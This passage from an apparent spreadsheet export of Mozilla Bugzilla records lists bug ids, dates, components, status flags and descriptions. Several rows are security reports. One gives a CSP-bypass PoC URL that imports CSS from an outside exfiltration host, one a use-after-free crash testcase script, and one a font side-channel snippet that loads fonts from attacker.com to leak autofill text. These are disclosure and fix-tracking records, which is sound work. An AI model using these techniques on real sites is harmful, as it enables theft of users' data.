DEBUG_FLR_IMAGE_TIMESTAMP:  577c1d67
STACK_COMMAND:  ~52s ; kb
FAILURE_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE_c0000005_xul.dll!nsINode::GetComposedDoc
BUCKET_ID:  X64_APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_xul!nsINode::GetComposedDoc+0
WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/firefox_exe/50_0_0_6030/577c1612/xul_dll/50_0_0_6030/577c1d67/c0000005/00103af8.htm?Retriage=1
Followup: MachineOwner</t>
        </is>
      </c>
      <c r="X2165" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2166">
      <c r="A2166" t="n">
        <v>735943</v>
      </c>
      <c r="B2166" t="inlineStr">
        <is>
          <t>2012-03-14 17:25:40 -0700</t>
        </is>
      </c>
      <c r="C2166" t="inlineStr">
        <is>
          <t>Crash @ nsCSSFrameConstructor::ProcessPendingRestyles</t>
        </is>
      </c>
      <c r="D2166" t="inlineStr">
        <is>
          <t>2012-05-18 13:26:27 -0700</t>
        </is>
      </c>
      <c r="E2166" t="n">
        <v>1</v>
      </c>
      <c r="F2166" t="n">
        <v>1</v>
      </c>
      <c r="G2166" t="n">
        <v>3</v>
      </c>
      <c r="H2166" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2166" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2166" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2166" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2166" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2166" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2166" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2166" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2166" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q2166" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2166" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2166" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T2166" t="n">
        <v>1</v>
      </c>
      <c r="U2166" t="n">
        <v>0</v>
      </c>
      <c r="V2166" t="n">
        <v>22</v>
      </c>
      <c r="W2166" t="inlineStr">
        <is>
          <t>Created attachment 606033
testcase (crashes Firefox when loaded)
About 50% of the time, this testcase causes a crash in nsCSSFrameConstructor::ProcessPendingRestyles.</t>
        </is>
      </c>
      <c r="X2166" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2167">
      <c r="A2167" t="n">
        <v>763941</v>
      </c>
      <c r="B2167" t="inlineStr">
        <is>
          <t>2012-06-12 08:01:16 -0700</t>
        </is>
      </c>
      <c r="C2167" t="inlineStr">
        <is>
          <t>SecReview: SocialAPI -  Security Code Review</t>
        </is>
      </c>
      <c r="D2167" t="inlineStr">
        <is>
          <t>2015-12-03 20:27:25 -0800</t>
        </is>
      </c>
      <c r="E2167" t="n">
        <v>1</v>
      </c>
      <c r="F2167" t="n">
        <v>1</v>
      </c>
      <c r="G2167" t="n">
        <v>5</v>
      </c>
      <c r="H2167" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2167" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J2167" t="inlineStr">
        <is>
          <t>Security Assurance</t>
        </is>
      </c>
      <c r="K2167" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2167" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2167" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2167" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2167" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2167" t="inlineStr">
        <is>
          <t>[waiting on code complete][score:48:Medium]</t>
        </is>
      </c>
      <c r="Q2167" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2167" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2167" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2167" t="n">
        <v>1</v>
      </c>
      <c r="U2167" t="n">
        <v>0</v>
      </c>
      <c r="V2167" t="n">
        <v>6</v>
      </c>
      <c r="W2167" t="inlineStr">
        <is>
          <t>SecReview Action Item bug
Security Code Review</t>
        </is>
      </c>
      <c r="X2167" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2168">
      <c r="A2168" t="n">
        <v>1605814</v>
      </c>
      <c r="B2168" t="inlineStr">
        <is>
          <t>2019-12-23 17:58:00 -0800</t>
        </is>
      </c>
      <c r="C2168" t="inlineStr">
        <is>
          <t>CSP nonce based doesn't block @import requests inside &lt;style&gt; tags with a properly nonce</t>
        </is>
      </c>
      <c r="D2168" t="inlineStr">
        <is>
          <t>2024-05-30 10:05:46 -0700</t>
        </is>
      </c>
      <c r="E2168" t="n">
        <v>1</v>
      </c>
      <c r="F2168" t="n">
        <v>1</v>
      </c>
      <c r="G2168" t="n">
        <v>3</v>
      </c>
      <c r="H2168" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2168" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2168" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2168" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2168" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2168" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2168" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2168" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2168" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][domsecurity-active][post-critsmash-triage][adv-main74+]</t>
        </is>
      </c>
      <c r="Q2168" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2168" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2168" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T2168" t="n">
        <v>1</v>
      </c>
      <c r="U2168" t="n">
        <v>0</v>
      </c>
      <c r="V2168" t="n">
        <v>20</v>
      </c>
      <c r="W2168" t="inlineStr">
        <is>
          <t>When user is able to inject CSS in some page protected by CSP nonce, firefox won't block @import requests making possible to leak sensitive content data.
Mozilla Developer Network documentation (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/style-src
) says:  "You can use a nonce-source to only allow specific inline style blocks"
So it seems that page should block intead of load arbitrary styles, as chrome does.
PoC:
To demonstrate this bug I wrote a web page that receives CSS from a parameter 'css' and insert it into a nonced style in page: http://abrasax.club/csp/css/?css=body{background-color:%20blue;}
the CSP defined by this page is: Content-Security-Policy: default-src 'self'; style-src 'nonce-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'; img-src data: http: https:; font-src data: http https
When some user abuse include @import tag the external content is included without get blocked by firefox: http://abrasax.club/csp/css/?css=@import%20url(https://l4t.cc/exfil/a.css);
when the same url is displayed in chrome it gets blocked, even if the source content becomes from the same domain: http://abrasax.club/csp/css/?css=@import%20url(./b.css);
So it becomes possible to abuse the load of @import exfiltrate leak page information, like tokens that didn't change in every request, small token's that reload for each request and for bigger tokens that reload for each refresh (using @import tehcnique: https://medium.com/@d0nut/better-exfiltration-via-html-injection-31c72a2dae8b or using font technique: https://twitter.com/terjanq/status/1180477124861407234)
I also sent 2 videos in attachments showing attack examples.</t>
        </is>
      </c>
      <c r="X2168" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2169">
      <c r="A2169" t="n">
        <v>916576</v>
      </c>
      <c r="B2169" t="inlineStr">
        <is>
          <t>2013-09-15 07:48:13 -0700</t>
        </is>
      </c>
      <c r="C2169" t="inlineStr">
        <is>
          <t>[FIX] ASAN use-after-free in nsIOService::NewChannelFromURIWithProxyFlags with Blob URL</t>
        </is>
      </c>
      <c r="D2169" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2169" t="n">
        <v>1</v>
      </c>
      <c r="F2169" t="n">
        <v>1</v>
      </c>
      <c r="G2169" t="n">
        <v>3</v>
      </c>
      <c r="H2169" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2169" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2169" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2169" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2169" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2169" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2169" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2169" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2169" t="inlineStr">
        <is>
          <t>[asan][adv-main25+][adv-esr1710+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q2169" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2169" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2169" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T2169" t="n">
        <v>1</v>
      </c>
      <c r="U2169" t="n">
        <v>0</v>
      </c>
      <c r="V2169" t="n">
        <v>24</v>
      </c>
      <c r="W2169" t="inlineStr">
        <is>
          <t>The following testcase crashes the nightly ASAN build:
&lt;script&gt;
function start() {
o103=document.createElement('iframe');
o168=new Blob([], {'type': 'image/gif'});
window.blob=URL.createObjectURL(o168)
document.body.appendChild(o103);
o299=document.createElement('script');
o300=document.createTextNode('cb1();');
o299.appendChild(o300);
document.documentElement.appendChild(o299);
}
function cb1() {
o103.src=blob;
o103.contentWindow.onresize=cb2;
}
function cb2() {
o103.src=blob;
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;</t>
        </is>
      </c>
      <c r="X2169" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2170">
      <c r="A2170" t="n">
        <v>50515</v>
      </c>
      <c r="B2170" t="inlineStr">
        <is>
          <t>2000-08-28 01:28:20 -0700</t>
        </is>
      </c>
      <c r="C2170" t="inlineStr">
        <is>
          <t>"most recently doomed" page lists m16 bugs instead of m18 bugs</t>
        </is>
      </c>
      <c r="D2170" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E2170" t="n">
        <v>1</v>
      </c>
      <c r="F2170" t="n">
        <v>1</v>
      </c>
      <c r="G2170" t="n">
        <v>4</v>
      </c>
      <c r="H2170" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2170" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2170" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2170" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2170" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2170" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N2170" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2170" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2170" t="inlineStr"/>
      <c r="Q2170" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2170" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2170" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T2170" t="n">
        <v>1</v>
      </c>
      <c r="U2170" t="n">
        <v>0</v>
      </c>
      <c r="V2170" t="n">
        <v>6</v>
      </c>
      <c r="W2170" t="inlineStr">
        <is>
          <t>m16 was a while ago.  i guess bugzilla isn't keeping up with the milestones.</t>
        </is>
      </c>
      <c r="X2170" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2171">
      <c r="A2171" t="n">
        <v>33514</v>
      </c>
      <c r="B2171" t="inlineStr">
        <is>
          <t>2000-03-27 15:35:27 -0800</t>
        </is>
      </c>
      <c r="C2171" t="inlineStr">
        <is>
          <t>Installing Talkback Taskmanager in Climate.</t>
        </is>
      </c>
      <c r="D2171" t="inlineStr">
        <is>
          <t>2005-03-28 07:07:05 -0800</t>
        </is>
      </c>
      <c r="E2171" t="n">
        <v>1</v>
      </c>
      <c r="F2171" t="n">
        <v>1</v>
      </c>
      <c r="G2171" t="n">
        <v>5</v>
      </c>
      <c r="H2171" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2171" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J2171" t="inlineStr">
        <is>
          <t>Talkback Server &amp; Webtool</t>
        </is>
      </c>
      <c r="K2171" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2171" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2171" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2171" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2171" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2171" t="inlineStr"/>
      <c r="Q2171" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2171" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2171" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2171" t="n">
        <v>1</v>
      </c>
      <c r="U2171" t="n">
        <v>0</v>
      </c>
      <c r="V2171" t="n">
        <v>4</v>
      </c>
      <c r="W2171" t="inlineStr">
        <is>
          <t>Purpose 
 Running daily reports. 
Problem Description 
  After running for few days it completely stops running or hangs. If we 
re-start the system then it runs ok for few days.</t>
        </is>
      </c>
      <c r="X2171" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2172">
      <c r="A2172" t="n">
        <v>16724</v>
      </c>
      <c r="B2172" t="inlineStr">
        <is>
          <t>1999-10-18 15:19:19 -0700</t>
        </is>
      </c>
      <c r="C2172" t="inlineStr">
        <is>
          <t>[CRASH] in nsRange using DOM viewer</t>
        </is>
      </c>
      <c r="D2172" t="inlineStr">
        <is>
          <t>1999-11-29 14:34:52 -0800</t>
        </is>
      </c>
      <c r="E2172" t="n">
        <v>1</v>
      </c>
      <c r="F2172" t="n">
        <v>1</v>
      </c>
      <c r="G2172" t="n">
        <v>3</v>
      </c>
      <c r="H2172" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2172" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2172" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2172" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2172" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2172" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2172" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2172" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2172" t="inlineStr"/>
      <c r="Q2172" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2172" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2172" t="inlineStr">
        <is>
          <t>M11</t>
        </is>
      </c>
      <c r="T2172" t="n">
        <v>1</v>
      </c>
      <c r="U2172" t="n">
        <v>0</v>
      </c>
      <c r="V2172" t="n">
        <v>5</v>
      </c>
      <c r="W2172" t="inlineStr">
        <is>
          <t>in apprunner, fire up DOM viewer
load URL above
click "refresh" button on DOM viewer
crash with this stack:
GKHTML! const  nsTreeCellFrame::`vftable'{for `nsIFrame'} address 0x01cd16a8
GetNodeBracketPoints(nsIContent * 0x02e612d0, nsCOMPtr&lt;nsIDOMNode&gt; * 0x0012f5b4
{0x00000000}, int * 0x0012f5bc, int * 0x0012f5c0) line 244
CompareNodeToRange(nsIContent * 0x02e612d0, nsIDOMRange * 0x02e6ae10, int *
0x0012f620, int * 0x0012f61c) line 191 + 21 bytes
nsContentSubtreeIterator::GetTopAncestorInRange(nsCOMPtr&lt;nsIContent&gt;
{0x02e62ee0}, nsCOMPtr&lt;nsIContent&gt; * 0x02e64e0c {0x00000000}) line 1072 + 34
bytes
nsContentSubtreeIterator::Init(nsContentSubtreeIterator * const 0x02e64e00,
nsIDOMRange * 0x02e6ae10) line 915 + 27 bytes
nsDOMSelection::selectFrames(nsDOMSelection * const 0x02d9f0a0, nsIDOMRange *
0x02e6ae10, int 0) line 1893
nsDOMSelection::Clear() line 1748
nsDOMSelection::Collapse(nsDOMSelection * const 0x02d9f0a0, nsIDOMNode *
0x02f34900, int 1) line 2416
nsRangeList::TakeFocus(nsRangeList * const 0x02d9e6f0, nsIContent * 0x02f34910,
unsigned int 1, unsigned int 2, int 0, int 0) line 1115
nsRangeList::HandleClick(nsRangeList * const 0x02d9e6f0, nsIContent *
0x02f34910, unsigned int 1, unsigned int 2, int 0, int 0, int 0) line 1027
nsFrame::HandlePress(nsFrame * const 0x02f36e10, nsIPresContext &amp; {...},
nsGUIEvent * 0x0012fbcc, nsEventStatus &amp; nsEventStatus_eIgnore) line 815
nsFrame::HandleEvent(nsFrame * const 0x02f36e10, nsIPresContext &amp; {...},
nsGUIEvent * 0x0012fbcc, nsEventStatus &amp; nsEventStatus_eIgnore) line 772
nsTitledButtonFrame::HandleEvent(nsTitledButtonFrame * const 0x02f36e10,
nsIPresContext &amp; {...}, nsGUIEvent * 0x0012fbcc, nsEventStatus &amp;
nsEventStatus_eIgnore) line 1172
PresShell::HandleEvent(PresShell * const 0x02d9f104, nsIView * 0x02d79cb0,
nsGUIEvent * 0x0012fbcc, nsEventStatus &amp; nsEventStatus_eIgnore) line 2162 + 38
bytes
nsView::HandleEvent(nsView * const 0x02d79cb0, nsGUIEvent * 0x0012fbcc, unsigned
int 28, nsEventStatus &amp; nsEventStatus_eIgnore, int &amp; 0) line 834
nsViewManager::DispatchEvent(nsViewManager * const 0x02d79d40, nsGUIEvent *
0x0012fbcc, nsEventStatus &amp; nsEventStatus_eIgnore) line 1739
HandleEvent(nsGUIEvent * 0x0012fbcc) line 63
nsWindow::DispatchEvent(nsWindow * const 0x02d79b74, nsGUIEvent * 0x0012fbcc,
nsEventStatus &amp; nsEventStatus_eIgnore) line 401 + 10 bytes
nsWindow::DispatchWindowEvent(nsGUIEvent * 0x0012fbcc) line 422
nsWindow::DispatchMouseEvent(unsigned int 302, nsPoint * 0x00000000 {x=???
y=???}) line 3394 + 21 bytes
ChildWindow::DispatchMouseEvent(unsigned int 302, nsPoint * 0x00000000 {x=???
y=???}) line 3612
nsWindow::ProcessMessage(unsigned int 513, unsigned int 1, long 1769476, long *
0x0012fdf4) line 2621 + 24 bytes
the problem is that in GetNodeBracketPoints, outParent is null when
dereferenced. the code below shows we fail to check outParent for null and
GetParentNode for an error result.
PRBool GetNodeBracketPoints(nsIContent* aNode,
                            nsCOMPtr&lt;nsIDOMNode&gt;* outParent,
                            PRInt32* outStartOffset,
                            PRInt32* outEndOffset)
{
  if (!aNode)
    return PR_FALSE;
  if (!outParent)
    return PR_FALSE;
  if (!outStartOffset)
    return PR_FALSE;
  if (!outEndOffset)
    return PR_FALSE;
  nsCOMPtr&lt;nsIDOMNode&gt; theDOMNode( do_QueryInterface(aNode) );
  PRInt32 indx;
  theDOMNode-&gt;GetParentNode(getter_AddRefs(*outParent));
  if (!(*outParent)) // special case for root node</t>
        </is>
      </c>
      <c r="X2172" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2173">
      <c r="A2173" t="n">
        <v>1694727</v>
      </c>
      <c r="B2173" t="inlineStr">
        <is>
          <t>2021-02-24 10:18:42 -0800</t>
        </is>
      </c>
      <c r="C2173" t="inlineStr">
        <is>
          <t>ContentParent::RecvSessionHistoryUpdate should not work outside of automation</t>
        </is>
      </c>
      <c r="D2173" t="inlineStr">
        <is>
          <t>2021-11-22 23:38:50 -0800</t>
        </is>
      </c>
      <c r="E2173" t="n">
        <v>1</v>
      </c>
      <c r="F2173" t="n">
        <v>1</v>
      </c>
      <c r="G2173" t="n">
        <v>3</v>
      </c>
      <c r="H2173" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2173" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2173" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K2173" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2173" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2173" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2173" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2173" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2173" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main88+]</t>
        </is>
      </c>
      <c r="Q2173" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2173" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2173" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T2173" t="n">
        <v>1</v>
      </c>
      <c r="U2173" t="n">
        <v>0</v>
      </c>
      <c r="V2173" t="n">
        <v>8</v>
      </c>
      <c r="W2173" t="inlineStr">
        <is>
          <t>I noticed that there's a PContent message SessionHistoryUpdate with the comment "This is a temporary way to pass index and length through parent process. Used for testing." It looks like what this does is reflect the session history update being sent from the child process back to other children in the same browsing context group, which may not be in the same process.
This seems potentially bad in the case where a child process gets taken over. I haven't found any particular place where this could cause an out of bounds memory access, but maybe manipulating the session history is enough. It also is probably not good that this session history update information coming from the parent needs to be treated as potentially hostile, which people reading code might not expect.
I'm not exactly sure how this could be addressed. Maybe enough time has passed that this message can be removed, or maybe we can have it be ignored (and not sent) when we're not in a testing environment?</t>
        </is>
      </c>
      <c r="X2173" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2174">
      <c r="A2174" t="n">
        <v>1741888</v>
      </c>
      <c r="B2174" t="inlineStr">
        <is>
          <t>2021-11-18 07:13:19 -0800</t>
        </is>
      </c>
      <c r="C2174" t="inlineStr">
        <is>
          <t>Autofill preview text can disclose sensitive information</t>
        </is>
      </c>
      <c r="D2174" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:07 -0700</t>
        </is>
      </c>
      <c r="E2174" t="n">
        <v>1</v>
      </c>
      <c r="F2174" t="n">
        <v>1</v>
      </c>
      <c r="G2174" t="n">
        <v>3</v>
      </c>
      <c r="H2174" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2174" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2174" t="inlineStr">
        <is>
          <t>Form Autofill</t>
        </is>
      </c>
      <c r="K2174" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2174" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2174" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2174" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2174" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2174" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main98+]</t>
        </is>
      </c>
      <c r="Q2174" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2174" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2174" t="inlineStr">
        <is>
          <t>98 Branch</t>
        </is>
      </c>
      <c r="T2174" t="n">
        <v>1</v>
      </c>
      <c r="U2174" t="n">
        <v>0</v>
      </c>
      <c r="V2174" t="n">
        <v>46</v>
      </c>
      <c r="W2174" t="inlineStr">
        <is>
          <t>The previewed text of autofill, shown to the user when the user hovers over an autofill entry, contains sensitive information and should not be accessible by the website until the user selects it. However, several vulnerabilities exist that can be used to steal the preview text.
1. Font side-channel attack
The font of the preview text follows the style of the field, making it possible to set the font of the preview text. The website can use a specially crafted font to infer the preview text, of which glyphs differ in size or font face.
(1) Size
Each character can have different width, and content can be inferred from size properties such as `scrollWidth.` Similar attacks have been proposed and patched in Chromium: crbug.com/916838 (CVE-2019-5810), crbug.com/951487 (CVE-2019-5848), crbug.com/1013882 (CVE-2019-13737), crbug.com/1035058 (CVE-2020-6393), and crbug.com/1035063.
(2) Ligatures
Font ligatures with abnormal size can be used to detect if a specific sequence exists (https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/).
(3) Font face
'unicode-range' of '@font-face' can be used to detect used characters in the font, e.g., assigning a single character for each font-faces:
@font-face {
  font-family: AutofillCheck;
  src: url(https://attacker.com/font.woff2?a) format('woff2');
  unicode-range: U+61; /* a */
}
W3C CSS Fonts Module Level 4 draft states:
&gt; For _especially privacy-sensitive contexts_, options would include never downloading any webfonts (at the risk that some characters may be rendered incorrectly, or not at all), or always downloading all webfonts whether needed or not (ignoring unicode-range, and potentially downloading vast quantities of unused fonts each time the page is viewed).
&gt; In addition, careful pairing of unicode-range and distinct src urls allows the third-party to see which characters are used on a page, which is a privacy risk for large character repertoire scripts such as CJK.
Whether a font face is loaded can be checked via the 'document.fonts.check()' API on the client-side or logging requests on the server-side.
(4) Chromium
Similar issues existed in Chromium, which other people and I've reported, and in response, they have pinned the preview font of &lt;input&gt; to `-webkit-small-control`: crrev.com/671647.
(5) Proposed fix
Pin the font family and size of the preview text to a system font, which stylesheets cannot override.
2. Inferring the content
(1) The credit card expiration date, U.S. states, countries, and most CJK words have an almost unique combination of used alphabets, so they can be reliably inferred.
(2) A uniquely identifiable character, possibly a homograph or invisible character, can be added to &lt;option&gt;s and used to identify suggested options.
(3) There is no limit on the number of &lt;option&gt;s that an autofill entry matches, so it can be used in brute-force and de-anonymization attacks.
(4) Proposed fix
Limit the number of &lt;option&gt;s that autofill entries can match
3. Real-world risks and scenarios
There are several bugs and tricks to enable autofill on hidden fields.
A legitimate form can use this to collect user information.
The autofill dialog can be activated by only two ArrowDown keypresses or a simple mouse action, which can be easily socially engineered into, e.g., phishing or disguised as a game.
The exploit takes only a few milliseconds and doesn't cause a noticeable delay. The popup will appear, but it'd be enough time to send information or make a purchase before the user notices, and it is dismissed if the focus is removed from the input, e.g., focusing on other elements or navigating away from the page.
4. Mitigating factors and future considerations
Currently, the autofill value is not filled multiple times, which can be used to reduce the search space. If it were to be implemented in the future, a reasonable limit on the number of the value filled should be put in place (crbug.com/1075734, CVE-2020-6521).</t>
        </is>
      </c>
      <c r="X2174" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2175">
      <c r="A2175" t="n">
        <v>452979</v>
      </c>
      <c r="B2175" t="inlineStr">
        <is>
          <t>2008-08-30 15:03:37 -0700</t>
        </is>
      </c>
      <c r="C2175" t="inlineStr">
        <is>
          <t>Invisible control characters in URL MUST NOT be decoded when showing its address</t>
        </is>
      </c>
      <c r="D2175" t="inlineStr">
        <is>
          <t>2009-03-25 22:19:42 -0700</t>
        </is>
      </c>
      <c r="E2175" t="n">
        <v>1</v>
      </c>
      <c r="F2175" t="n">
        <v>1</v>
      </c>
      <c r="G2175" t="n">
        <v>2</v>
      </c>
      <c r="H2175" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2175" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2175" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K2175" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2175" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2175" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2175" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2175" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2175" t="inlineStr">
        <is>
          <t>[sg:low] spoof</t>
        </is>
      </c>
      <c r="Q2175" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2175" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2175" t="inlineStr">
        <is>
          <t>Firefox 3.5</t>
        </is>
      </c>
      <c r="T2175" t="n">
        <v>1</v>
      </c>
